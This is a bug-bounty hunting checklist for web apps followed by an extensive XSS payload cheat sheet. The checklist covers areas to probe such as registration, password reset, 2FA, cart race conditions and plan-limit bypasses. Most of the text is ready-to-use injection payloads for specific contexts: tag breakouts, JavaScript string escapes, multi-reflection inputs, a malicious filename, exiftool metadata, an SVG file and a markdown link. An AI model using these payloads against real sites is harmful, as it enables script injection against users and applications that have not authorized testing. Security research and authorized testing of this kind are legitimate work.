- API docs/support pages. Explore functionality to understand the app better.
- Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them.
- Register functionality. IDORS, unexpiring tokens, reused tokens,
- Password reset.
- 2FA.
- User Management (auth model). Try to build RBAC matrix.
- My profile section.
- User invites
- See if inviting an existing user to your org exposes their name
- See if inviting an existing user removes them from their own org
- User management
- Customer data
- Look for JS, ctrl+f and try to find /admin /api and etc.
- Look for API
- If an endpoint has api/v2/, try api/v1/
- Undocumented API Calls and Admin tools
- Upload functions
- Integration functions
- Look for subdomains, don't hack on them since they will be OOS, but try to find the way to to elavate it to your main target.
- If you find a bug that's OOS, still ask the customer if they care

Cart section
- Integer overflow
- Business logic errors (-1 number of items)
- Rate limit on coupon
- Race condition on coupon
- Any interesting parameters

Giftcards
- Any interesting parameters
- Race condition
- Reflected XSS
- API endpoint enumeration

Intercom
- Intercom('show');
- Intercom('boot',{email:'[email protected]'})

xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,svg,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt

Use when input lands inside an attribute’s value of an HTML tag or outside tag except the ones described in next case. Prepend a “-->” to payload if input lands in HTML comments.
<svg onload=alert(1)>
"><svg onload=alert(1)>

HTML Injection – Tag Block Breakout
Use when input lands inside or between opening/closing of the following tags:
<title><style><script><textarea><noscript><pre><xmp> and <iframe> (</tag> is accordingly).
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>

HTML Injection - Inline
Use when input lands inside an attribute’s value of an HTML tag but that tag can’t be terminated by greater than sign (>).
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //

HTML Injection - Source

Use when input lands as a value of the following HTML tag attributes: href, src, data or action (also formaction). Src attribute in script tags can be an URL or “data:,alert(1)”.
javascript:alert(1)

Javascript Injection
Use when input lands in a script block, inside a string delimited value.
'-alert(1)-'
'/alert(1)//


Javascript Injection - Escape Bypass
Use when input lands in a script block, inside a string delimited value but quotes are escaped by a backslash.
\'/alert(1)//

Javascript Injection – Script Breakout
Use when input lands anywhere within a script block.
</script><svg onload=alert(1)>

Javascript Injection - Logical Block
Use 1st or 2nd payloads when input lands in a script block, inside a string delimited value and inside a single logical block like function or conditional (if, else, etc). If quote is escaped with a backslash, use 3rd payload.
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//

Javascript Injection - Quoteless

Use when there’s multi reflection in the same line of JS code. 1st payload works in simple JS variables and 2nd one works in non-nested JS objects.
/alert(1)//\
/alert(1)}//\

Javascript Context - Placeholder Injection in Template LiteralUse when input lands inside backticks (``) delimited strings or in template engines.
${alert(1)}

Multi Reflection HTML Injection - Double Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
/alert(1)</script><script>/

Multi Reflection i HTML Injection - Triple Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
/alert(1)">'onload="/<svg/1='
-alert(1)">'onload="<svg/1='
/</script>'>alert(1)/<script/1='

Multi Input Reflections HTML Injection - Double & Triple
Use to take advantage of multiple input reflections on same page. Also useful in HPP (HTTP Parameter Pollution) scenarios, where there are reflections for repeated parameters. 3rd payload makes use of comma-separated reflections of the same parameter.
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/&r=/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>

Use when uploaded filename is reflected somewhere in target page.
"><svg onload=alert(1)>.gif

Use when metadata of uploaded file is reflected somewhere in target page. It uses command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg

Use to create a stored XSS on target when uploading image files. Save content below as
“xss.svg”.
<svg xmlns="https://www.w3.org/2000/svg" onload="alert(1)"/>

Use to test for XSS when injection gets inserted into DOM as valid markup instead of being reflected in source code. It works for cases where script tag and other vectors won’t work.
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>

Use when native javascript code inserts into page the results of a request to an URL that can be controlled by attacker.
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>

Use when current URL is used by target’s underlying PHP code as an attribute value of an HTML form, for example. Inject between php extension and start of query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader

Use in text boxes, comment sections, etc that allows some markup input. Click to fire.
[clickme](javascript:alert`1`)